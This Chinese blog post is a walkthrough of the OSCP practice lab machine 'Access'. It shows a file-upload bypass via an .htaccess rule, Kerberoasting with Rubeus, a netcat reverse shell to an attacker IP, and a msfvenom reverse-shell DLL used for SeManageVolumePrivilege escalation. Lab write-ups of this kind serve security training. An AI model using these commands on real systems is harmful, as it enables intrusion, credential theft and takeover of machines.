OSCP考试靶机练习-Access

最新推荐文章于 2025-06-04 10:30:22 发布
最新推荐文章于 2025-06-04 10:30:22 发布
阅读量861 收藏 8
点赞数 3
CC 4.0 BY-SA版权
分类专栏: 靶机 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_33522010/article/details/147375978

该靶机通过利用 Web 应用程序中的文件上传功能来上传 PHP Web Shell 获得。然后权限将升级到 svc_mysql,提权使用 SeManageVolumePrivilege 。

拿shell阶段

端口扫描
TCP:

nmap -sC -sV -p- -T4 -n $IP

53/tcp    open  domain        (generic dns response: SERVFAIL)
| fingerprint-strings: 
|   DNS-SD-TCP: 
|     _services
|     _dns-sd
|     _udp
|_    local
80/tcp    open  http          Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Access The Event
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-07 02:30:44Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http      Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
| http-methods: 
|_  Potentially risky methods: TRACE
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
|_http-title: Access The Event
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49701/tcp open  msrpc         Microsoft Windows RPC
49782/tcp open  msrpc         Microsoft Windows RPC

80HTTP

在这里插入图片描述
枚举网站信息,发现图片上传点
在这里插入图片描述

PHP上传绕过

通过上传.htaccess 文件绕过,文件内容为:

AddType application/x-httpd-php .jpg

可以将文件后缀为.jpg的都将作为php脚本执行

上传windows版本反向reshell:
在这里插入图片描述
命名为reshell.jpg,拿到shell
在这里插入图片描述

提权阶段

因为在域环境,可以执行Kerberoasting攻击拿到用户

原理:根据Kerberos 协议的工作原理。当用户要访问由服务主名(SPN)托管的资源时,客户端会请求一张由域控制器生成的服务票据TGS。由域控制器生成。然后,应用服务器会对服务票据进行解密和验证。因为它是通过 SPN 账户的密码哈希值加密的。当用户从域控制器请求服务票据时,DC不会执行任何检查以确认确认用户是否有访问 SPN 托管服务的权限。只有在连接到服务本身时,才会进行检查。这意味着如果我们知道我们要针对的 SPN,我们就可以从域控制器申请服务票据。然后进行破解哈希密码。

.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
拿到hash,进行破解密码。

得到密码后可以使用runas脚本切换用户:

powershell -ep bypass
Import-Module .\Invoke-RunasCs.ps1
Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command ".\nc.exe -e cmd.exe 192.168.45.196 443

在这里插入图片描述
成功切换用户。
使用
whoami /priv 查看权限,发现有SeManageVolumePrivilege

利用步骤:
使用 SeManageVolumeExploit.exe

工具:https://github.com/CsEnox/SeManageVolumeExploit

利用步骤:
在这里插入图片描述

生成 使用Printconfig.dll
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.196 LPORT=443 -f dll -o Printconfig.dll

$type = [Type]::GetTypeFromCLSID({854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)

在这里插入图片描述
成功提权

OSCP靶场6-Stapler(用户收集、wordpress、SMB、mysql上传文件执行反弹shell、用户历史命令)
墨痕诉清风的博客
06-06 576
步骤 0:目标发现所以……和往常一样,让我们​​看看我们的目标在网络上的位置10.10.10.1 是 DHCP 服务器……让 10.10.10.2 成为“受害者”机器第 1 步:TCP 开放端口扫描为了速度,我们现在不会专注于版本扫描等……我们只是想看看有什么是活着的虽然有些端口看起来很明显,但还有一些其他端口,例如 '666' 被错误地表示为 'doom' - 这些只是特定端口号的 nmap 默认值。我们需要进行更详细的扫描,以查看真正活着的东西。第 2 步:TCP 主动端口扫描。
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
热门推荐
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
HTB 赛季8靶场 - Certificate
weixin_44368093的博客
06-04 1682
所以我们只能ffuf,upload.php的get接口,我们ffuf没有结果,所以进行一定程度的sid变种尝试,发现了s_id。经过不懈努力,我们成功绕过了upload的控制逻辑,将两个zip文件合并,该上传文件口就会解压两个zip文件,从而导致webshell被上传。我们仅关注certificate.htb的用户,结合了解的域用户情况,我们认为sara.b有价值,其他无价值。我们在sara.b这个用户发现有趣的上下游,其中我们应该关注用户有这么些,我们可以修改这些用户。
OSCP考试靶机练习-Internal(Proving Grounds Practice)
qq_33522010的博客
04-19 259
tcp和udp都要扫描。
OSCP靶机练习--CuteNews01
一杯咖啡的渗透记忆
05-19 1798
靶机地址:BBS (cute): 1.0.2 ~ VulnHub 靶机环境搭建: 个人本地环境:VMWare已经安装好了,因为虚拟机镜像是virtualBox的.vbox结尾,所以在本地又安装了VitualBox VMWare和VitualBox的NAT网络不能同时使用, 整了半天也没搞起来,后来才知道这两种虚拟程序不能同时使用NAT。 所以使用了另外一台Kali的机器,直接用主机来测了。靶机本地用VirtualBox安装靶机。 但因为不在同一台机器上面,所以才用的是桥接的方式链接,如下:
OSCP靶机练习--CuteNews03(English Report)
一杯咖啡的渗透记忆
05-21 427
Summary of Results Initial reconnaissance of the MegaCorp One network resulted in the discovery of a misconfigured DNS server that allowed a DNS zone transfer. The results provided us with a listing of specific hosts to target for this assessment. An exami
OSCP靶机练习PG hokkaido
qq_33522010的博客
06-04 145
oscp靶机练习
DC-6靶机练习
Blanks的博客
04-11 853
带你去体验最真实的渗透环境,文章里不会直接摆答案,会全面的带你去进行信息收集以及漏洞利用,会领着你一步一步踩下我踩过的坑,实战往往比这更绝望,练技术须实践。
LampSecurityCTF4---靶机练习
Blanks的博客
01-13 1312
带你去体验最真实的渗透环境,文章里不会直接摆答案,会全面的带你去进行信息收集以及漏洞利用,会领着你一步一步踩下我踩过的坑,实战往往比这更绝望,练技术须实践。
oscp备考,oscp系列——SolidState靶场,两种方法绕过rbash环境
2202_75361164的博客
12-19 1027
oscp备考,oscp系列——SolidState靶场,两种方法绕过rbash环境难度简单偏上nmap扫描4555端口发现james,发现历史漏洞:默认账号密码:root/root,远程命令执行通过telnet,pop3服务,邮箱服务,使用retr命令下载文件,发现账号密码,猜测为ssh登录登录之后发现是rbash,获取第一个flag进行逃逸,并且提权,获取第二个flag。
靶机渗透练习90-Grotesque:1.0.1
hirak0的博客
05-02 3168
靶机描述 靶机地址:https://www.vulnhub.com/entry/grotesque-101,658/ Description get flags difficulty: medium about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions. This works
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8742
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
物联网通信协议_MQTT客户端开发_C语言跨平台实现_轻量级消息传输库_异步同步双模式支持_SSL_TLS加密通信_开源项目维护_嵌入式系统适配_多线程安全处理_消息队列遥测传输协议实现_发布.zip
07-27
物联网项目资源
高二物理电磁波与信息化社会(1).pptx
07-27
高二物理电磁波与信息化社会(1).pptx
NCT-Python编程一级-模拟卷4含答案word复习知识点试卷试题(1).doc
最新发布
07-27
NCT-Python编程一级-模拟卷4含答案word复习知识点试卷试题(1).doc
移动互联网的未来未来走势(1).ppt
07-27
移动互联网的未来未来走势(1).ppt
完整版电气自动化专业面试问题(1).doc
07-27
完整版电气自动化专业面试问题(1).doc
幼儿园小班综合好玩的球FLASH课件动画教案下载(1).docx
07-27
幼儿园小班综合好玩的球FLASH课件动画教案下载(1).docx
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-优快云博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值